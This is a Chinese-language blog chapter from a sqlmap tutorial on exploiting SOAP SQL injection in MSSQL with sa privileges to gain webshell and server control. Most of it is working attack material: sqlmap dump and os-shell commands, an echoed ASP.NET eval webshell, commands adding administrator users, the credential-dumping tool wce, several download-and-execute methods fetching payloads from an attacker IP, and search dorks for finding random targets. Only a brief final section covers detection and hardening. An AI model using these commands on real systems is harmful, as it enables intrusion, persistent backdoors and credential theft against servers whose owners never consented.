sqlmap从入门到精通-第六章-6-4 SOAP注入MSSQL数据库sa权限处理思路及实战

6.4 SOAP注入MSSQL数据库sa权限处理思路及实战

6.4.1 注入点获取webshell及服务器权限思路

讨论一下通过注入点如何获取webshell的思路及服务器权限

下面有些是前面章节提到过的内容,重要常用的东西还是得每次都提一下

1. 普通权限SQL注入获取webshell思路

(1) 通过sqlmap对注入点进行测试,获取数据库管理表

(2) 主要用到sqlmap命令

sqlmap.py -u url 或者 sqlmap.py -r bmfx.txt  bmfx.txt是抓包得http请求

sqlmap.py -u url --current-db

sqlmap.py -u url --current-user

sqlmap.py -u url -D databasename --tables

sqlmap.py -u url -D databasename -T admin --column

sqlmap.py -u url -D databasename -T admin --count

sqlmap.py -u url -D databasename -T admin --dump

(3) 管理员表密码破解

可以对管理员表admin得密码进行分析和破解,在线破解网站cmd5和somd5网站进行破解,但是对于变异加密只能通过已知密码进行猜测和对比

(4) 扫描后台登录地址

使用小萝卜头Havij,御剑等工具进行后台地址扫描,也可以通过Google进行搜索,例如:site:xxx.com  login

(5) 登录后台,寻找上传漏洞或者其他漏洞

(6) 获取webshell

2. sa权限注入点可直连数据库处理思路

(1) 注入点确认测试

sqlmap.py -u url 或者 sqlmap.py -r bmfx.txt

(2) 判断当前注入点类型,判断为DBA权限则继续,否则放弃

sqlmap.py -u url --is-dba 或者 sqlmap.py -r bmfx.txt --is-dba

(3) 获取数据库密码

sqlmap.py -u url --password

(4) 对服务器IP地址进行扫描

nmap -sS -Pn -A 192.168.1.2

masscan -p 1-63522 192.168.1.2

(5) 对sa口令进行破解

在cmd5网站可以对MSSQL和MSSQL 2012进行密码暴力破解

(6) 尝试使用SQLTOOLS, SQL查询分析器,SQL客户端程序,Navicat Premium, Navicat for SQL Server 进行数据库的连接,如果能够成功连接,就尝试使用xp_cmdshell存储过程恢复并执行命令

具体关于xp_cmdshell的操作可以看前面的章节

3. sqlmap对注入点进行利用获取webshell及权限思路

(1) 通过sqlmap注入点进行测试,确认存在漏洞

sqlmap.py -u url 或者 sqlmap.py -r bmfx.txt

(2) 确认为sa权限

sqlmap.py -u url --is-dba 返回结果是True证明为DBA权限

(3) 直接获取os-shell

sqlmap.py -u url --os-shell

(4) 通过--os-shell进行权限及命令执行测试

whoami,ipconfig,ifconfig,netstat -tunlpa,

(5) 直接系统权限

如果当前注入点获取的os-shell是系统权限,Windows环境下,那么就直接添加用户即可

注意:有些系统需要密码复杂度验证,如果不通过,则可以修改已知用户密码来实现,如果获取的是非系统权限,低权限用户则继续

(6) 同dir命令寻找网站根目录

dir c:\

(7) echo文件命令到服务器进行测试

echo test > D:\web\bmfx.txt

(8) 查看文件内容

type D:\web\web.config

(9) 访问网站测试

在浏览器中直接打开目标的url地址,例如:http://10.2.2.3/bmfx.txt ,如果能够正常显示则意味着离获取webshell越来越近了

(10) echo一句话后门

echo ^<%@ Page Language="Jscript"%^>^<%eval (Request.Item["pass"],"unsafe");%^>> D:\www\webcms.aspx '

其他后门类似,需要注意的是使用"^"符号来处理重定向符号

(11) 获取webshell

一句话后门地址为http://10.1.1.2/webcms.aspx 密码是pass

(12) 生成系统信息文件

systeminifo > bmfxtg.txt

(13) Windows-Exploit-Suggester分析目标补丁更新情况

这里我前面章节详细讲到过,可以翻看前面的章节,这个有点过时,具体到后面讲解的时候看看有没有新的方法

(14) 下载Windows exp进行提权测试

https://github.com/AonCyberLabs/Windows-Exploit-Suggester

https://blog.gdssecurity.com/labs/2014/7/11/introducing-windows-exploit-suggester.html

记住下面命令进行查询

wmic qfe get Caption,Description,HotFixID,InstalledOn

wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB3136041" /C:"KB4018483"

(15) 获取系统权限

使用exp得时候,有3种思路,第一种是直接添加用户,第二种是获取当前登录系统得明文密码,第三种是反弹木马,一般exp命令如下:

expn0day "net user bmfx bmfx /add"

expn0day "net localgroup administrators bmfx /add"

expn0day "net localgroup administrators"

expn0day "wce -w" //将wce程序上传至目标目录里面执行

expn0day "muma.exe" // 上传至目标,进行反弹,或者使用MSF生成反弹木马

4. 成功率比较高得ms16-075提权方法

这个上一章节讲过

6.4.2 渗透中命令提示符下得文件上传方法

使用sqlmap进行漏洞测试的时候,有时需要上传文件,在各种反弹shell中也是需要进行文件的上传,下面是收集的一些文件上传的方法

1. sqlmap自带文件上传方法

(1) Kali下上传bmfx.vbs文件到目标系统的C盘根目录

sqlmap.py -r bmfx.txt --file-write="/root/bmfx.vbs" --file-dest="D:\bmfx.vbs"

(2) Windows下将wce上传至目标D盘根目录

sqlmap.py -r bmfx.txt --file-write="C:\tool\sqlmap\wce.exe" --file-dest="D:\wce.exe"

2. bitsadmin上传

bitsadmin /transfer myjob1 /download /priority normal http://www.ss.com/data/wce.exe D:\wce.exe

bitsadmin /transfer n http://www.ss.com/data/wce.exe D:\wce.exe

3. FTP下载方法

需要有公网IP地址,假设192.168.1.33为公网IP地址,且提供了FTP服务,可以使用系统自带的,也可以使用第三方软件搭建的FTP服务,通过创建FTP账号和密码是ftp,进行逐行执行即可

echo open 192.168.1.33 21 > ftp.txt

echo ftp >> ftp.txt

echo bin >> ftp.txt

echo ftp >> ftp.txt

echo GET muma.exe >> ftp.txt

ftp -s:ftp.txt

4. powershell下载

powershell (new-object System.Net.WebClient).DownloadFile('http://192.168.1.33/wce.exe', 'D:\wce.exe')

5. csc法

csc.exe 是微软.NET Framework中C#编译器,Windows系统中默认包含,可在命令行下将cs文件编译成exe

(1) download.cs代码

using System.Net;

namespace downloader

{

class Program

{

static void Main(string[] args)

{

WebClient client = new WebClient();

string URLAddress = @"http://192.168.1.33/wce.exe";

string receivePath = @"C:\test\update\";

client.DownloadFile(URLAddress, receivePath + System.IO.Path.GetFileName

(URLAddress));

}

}

}

(2) 执行编译过程

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe /out:C:\test\update\download.exe C:\test\update\download.cs

(3) 执行download.exe 文件即可下载

实际测试的时候把上面的下载地址换成自己的实际地址即可

6. echo vbs XMLHTTP方法下载

(1) echo脚本

echo Set xPost = CreateObject("Microsoft.XMLHTTP") > bmfx.vbs

echo xPost.Open "GET","http://192.168.1.33/data/wce.exe", 0 >> bmfx.vbs

echo xPost.Send() >> bmfx.vbs

echo Set sGet = CreateObject("ADODB.Stream") >> bmfx.vbs

echo sGet.Mode = 3 >> bmfx.vbs

echo sGet.Type = 1 >> bmfx.vbs

echo sGet.Open() >> bmfx.vbs

echo sGet.Write(xPost.responseBody) >> bmfx.vbs

echo sGet.SaveToFile "bmfx.exe", 2 >> bmfx.vbs

(2) 执行bmfx.vbs

cscript bmfx.vbs

7. Msxml2.XMLHTTP vbs脚本法下载并执行

Set Post = CreateObject("Msxml2.XMLHTTP")

Set Shell = CreateObject("Wscript.Shell")

Post.Open "GET","http://192.168.1.33/data/wce.exe", 0

Post.Send()

Set aGet = CreateObject("ADODB.Stream")

aGet.Mode = 3

aGet.Type = 1

aGet.Open()

aGet.Write(Post.responseBody)

aGet.SaveToFile "C:\wce.exe", 2

wscript.sleep 10000

Shell.Run ("C:\wce.exe") //延后执行下载文件

8. exe2bat转换exe为bat

有单独的脚本,可以将exe转换为bat,但是如果文件过大,将可能导致出错

6.4.3 SOAP注入漏洞扫描及发现

1. 随机寻找目标

(1) 使用搜索引擎搜索asmx关键字,在百度或者谷歌搜索inurl:Service.asmx

(2) 使用fofa网站对关键字.asmx 进行检索,也可以使用zoomeye和shodan进行搜索,使用不同的关键字效果会比较好

intext:word, intitle:word进行搜索

2. 定向目标SOAP注入发现

对目标站点的页面进行源代码查看,在其中搜索asmx关键字,搜索出来之后在浏览器中进行访问

3. 漏洞扫描

使用AWVS进行扫描

4. 保存HTTP header文件

如果使用AWVS扫描出来了漏洞,找到"View HTTP headers" 复制出来保存文本文件为bmfx.txt 将其中标记为payload的位置改成-1* 然后使用sqlmap -r bmfx.txt进行注入测试

6.4.4 使用sqlmap对SOAP注入点进行验证和测试

下面都是常规套路,跟前面章节讲的都是一样的

1. 确认SQL注入点

2. 查看DBA权限

3. 获取os-shell

4. 测试DoS命令执行情况,获取系统信息

例如:ipconfig, netstat -ano, whoami, net user

5. 使用sqlmap进行文件上传测试

(1) 上传vbs文件

(2) 在服务器上查看上传的文件

dir C:\*.vbs

cscript C:\bmfx.vbs

(3) 命令成功,却无法下载

上传文件未成功

bitsadmin /transfer myjob1 /download /priority normal http://www.ss.com/data/wce.exe D:\wce.exe

使用下面的方式进行下载

bitsadmin /transfer n http://www.ss.com/data/wce.exe D:\wce.exe

6.4.5 获取服务器权限

1. 添加和修改用户命令

(1) 直接添加用户命令

(2) 修改用户口令

2. 登录目标服务器远程桌面

3. 获取服务器其他账号密码

6.4.6 渗透总结与防御

1. 渗透总结

本节对如何利用SQL注入点获取webshell及服务器权限进行了探讨,通过一个实际例子介绍了如何利用sqlmap获取系统权限,sqlmap进行os-shell操作,其回显会因为网络相关原因显示较慢,存在实际延迟

2. 安全检查与防御

(1) sqlmap安全检查

利用os-shell命令进行渗透,会在SQL Server当前数据库中创建sqlmapoutput这个表,可以针对性的检查,如果发现存在

这个表,则意味着服务器Web程序可能存在高危注入漏洞

(2) 其他安全检查和安全加固

登录目标服务器之后,通过简单的查看服务,发现服务器上存在后门文件,说明早期有人入侵过,建议对服务器进行彻底安全检查,同时降低数据库账号权限,按照安全防护软件

文件下载参考:

https://www.secpulse.com/archives/44450.html

https://www.dazhuanlan.com/2019/12/14/5df3dc3fbeeb9/

https://www.dazhuanlan.com/2020/03/07/5e6354ece7a67/

 


 
posted @ 2020-07-23 15:16  皇帽讲绿帽带法技巧  阅读(764)  评论(0编辑  收藏  举报